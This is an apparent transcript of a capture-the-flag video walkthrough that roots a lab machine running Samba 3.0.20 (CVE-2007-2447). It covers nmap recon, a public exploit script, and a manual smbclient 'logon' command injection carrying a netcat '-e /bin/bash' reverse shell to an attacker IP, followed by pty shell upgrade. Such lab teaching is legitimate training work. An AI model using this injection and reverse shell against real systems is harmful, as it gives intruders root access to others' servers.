Hello all, welcome to Global Offensive Hacker Associate community and welcome to another hacking episode of Hacker Associate. In this video, I'm going to walk you through a LAM, like how we can perform pen testing on this machine and how we can get the root shell. This is a part for today part. So it's very easy machine by the way, and it's very easy, super easy. So simple, what you can do is you can perform as usual. First part is recon, information gathering. So here I have used this command call as nmap minus as capital C minus capital V, and then you can see this IP address 10.10.10.3, and you can see these are the ports open, and when I go down, these are the ports open there. 21 we have FTP, anonymous FTP login allowed. Second we have SSH, okay, and then if we go a little bit down, there is Samba ports are open like 445. So let me just show you, these are the ports, open. Let me zoom it this part, and here are the ports 445, and these details about the version, and 139 we have a Samba 3 port X and 4.x. Now let's see how we can identify the vulnerability. So what you can do is you can simple go here, and then you can simply just type search exploit and then the version search exploit Samba 3.0.20. when you press enter, and here you go. So here like we identify some version related the particular exploit related to the particular version. So if you can check Samba 3.0, and here is the correct version, Samba 3.0.20. So now you have a two method in order to exploit this machine. The first one is you can directly go to the Metasploit, and then you can run this one user map script, and then you're able to get the root shell. So I am like focusing always on manual testing, so I'll not use a Metasploit part, but it depends up to you. If you want to use Metasploit, you can use it. So what I can do is I can use the script. Here we can say user map script. So let me go to my document folder first. So within a 5 minute, I'll get root shell. So how we can do that? So first you can go simple document, and let me press enter ls, and then I have a scripts folder here. Then we can simple go to the cd cve Samba exploit ls, and here is the details. This is cve 2007 2447. Just go to the directory. After that I'm going to run this script. So how we can run it? You can simply use Python, because it's a Python extension is there, so we'll use Python, and after that user map script, and then this is the IP. So let me check what is my IP address first. So IP space A, and here we have 10.10.10. It means the 10.10.10.3 is the machine IP, and 10.10.14.2 is the IP address of my system. So fantastic. We are done now here, and this is my IP, this is the port. It means remote IP, remote port, local IP, local port. And now before hitting enter here, what I can do is I can start listener. So nc minus lvvp 443, press enter, and once you're done with this part, simple C. Now I'm going to press enter, and you can see it is exploited, and you can see it's just taken only I think maybe 7 seconds in order to get the shell. So how we can check it out? You can see I got the shell, and I can simply just type ls command, and I can see the things clearly. And if I moved here, now you can see I don't have a proper shell, so I can import the shell. I will try it Python, and then single quote import, and then pty termination pty dot spawn spawn. Basically I want to drop here bin bash. So let me try this command, it is working or not. So here you go. So now you're on the root side, and then cd/root ls, and we have the root flag available here, root.txt. So cat root.txt, and here you go. That's how you can identify the flag. This is the first method. Very easy, super easy, right? Simple. Run the script and you got the shell. Second method, is a little bit like technical part. So I am now going to show you like the complete reconnaissance of that particular machine. Simple, you can just simple go out from this exit. So I'm just putting Control C out from here. Let me close the script, everything. So now what I can do is I can check for the Samba exploit. So what we have done is we have already exploited using this user map script. Now I'm going to perform enumeration. So how we can perform enumeration? So I can use smb map minus h and then IP address, which is 10.10.10.3. So 10 10 10 3 IP, press enter. Just checking. Okay, it will take a time, just wait for it. So IP connecting to 445 and the name is 10 10 10 3, working on it. Just wait for it. Okay, I'll come to this point once it is done. So in our first method, okay, we have tried, okay, like script and we get the root shell. Now I'm going to show you, okay, like the different method, okay, like we can say the manual testing, and using that, okay, like how we can get a root shell. So I'm exploiting the same vulnerability SMB version 3.0.20 using a manual testing. So what we can do is, okay, you can do some manual particular stuff. You can type the command SMB map, you can type -h and then IP 10 10 10 10.3. So when you press enter here, okay, you will see, okay, like some directories are mapped and you can check some permissions. So you can clearly see I have a disk print and then no access, I have a temp directory and then I have a read and write, then I have a OPT no access and then same IPC and admin. So I can try with the temp. So what I can do, I can simply just type SMB client, try to login -L, and I can try 10.10.10.3. And how we can do that? Simple, you can simple type, press enter, okay, or you can simple press enter. So when you press enter, now you to login, press enter because it's anonymous login, and here you go. So it is logging, it means it is working. Okay, and now what I can do is I can use again the same command SMB client, and after that I can use simple 10.10.10.3, and this time, okay, I am going to map this directory 10 which have a permission, right, read and write. But remember, okay, like if you are trying this command, okay, in Kali 2020, it will not work. So it's better you can switch to the Kali 2019 KDE or 18 version. Sometime, okay, like issue happen, okay, in 2020, okay, so even I am, okay, doing a lot of, okay, boxes, okay, so I have idea, okay, like if this is not working in 2020, it's better you can switch to the other platform. Sometime it will not work, sometime, okay, like if you change the operating system, it will work, okay, like in a very good way. So now when you press enter, so here, okay, like I have to specify one more command like double forward slash and then enter. So now enter once again, and now you can see clearly now I'm logged in here, right? Now you can simply just type a help command, and here is option called as a logon. So if you can check it out, okay, somewhere, okay, I had seen the option called as logon. So I'm checking out, okay, what are the other commands available for us. So here you can see this is a logon, this is the log off. So what I can do is I can simple type, okay, like logon, and I can try to get a reverse connection. So you can use double quotes, and you can use dot slash equal to, and I'm going to use no hop, and then after that I can try for NC and then -VV, the attacker IP and attacker port 10.10.14.2, and the IP which is, okay, going to take 4444, and you can give whatever the shell you want to give, -E/bin/bash, and then here, okay, you can simple close it, and then it is done. So if everything is right, okay, then we'll get a reverse connection here. So NC -LVVP, I'm going to use 4444, and before this, okay, I'm going to check my IP address which is 10.10.14.2. So here, okay, we are, and here is listening and everything, okay. When you press enter, so this is asking for the password. Let me enter. Session is setup failed. One more I can try, okay, this one. So first, okay, we're going to log on, and then you can use, okay, then close it, dot slash, and after that I'm going to use this no, and after that NC -VV 10.10.14.2 4444 -E/bin/bash, and then this, okay, this is the tilt I'm using, and last time I have used, okay, single quote, but this time, okay, like I think it's a typo error. So now I have resolved it, and now let's check it out, okay, like we're able to get the shell or not. So here is NC is running, fantastic, and now when you press enter, let me check I'm able to get the shell or not. So this is the NC, and here, okay, still I didn't get any shell. Just waiting for the shell. So here you go. Okay, you got the root connection. See here from this section. So when I try to run this command, okay, and I got the shell. Now you can simple okay import python -c single quote. You can use import pty and then pty.spawn /bin/bash, and after that you can simply use single quote close, and now we are here id. Now we got the root, then cd/root ls, and then we have a text, so cat root.txt. So that's how okay you can root this machine. So in this video okay, like we have learned the two method. The first method okay, like we can clearly see like using automation script, and the second method okay, like you can see I have done manually. When the both the method I have done okay manually, but the second method okay, like I just simple use okay like SMB related stuff, and after that okay I simply logged in, and then okay from there I have taken a reverse connection okay using okay like SMB client, and you can see we successfully rooted this machine. I hope this video is informative for you. Thank you for watching the video, and stay tuned with me for the next episode.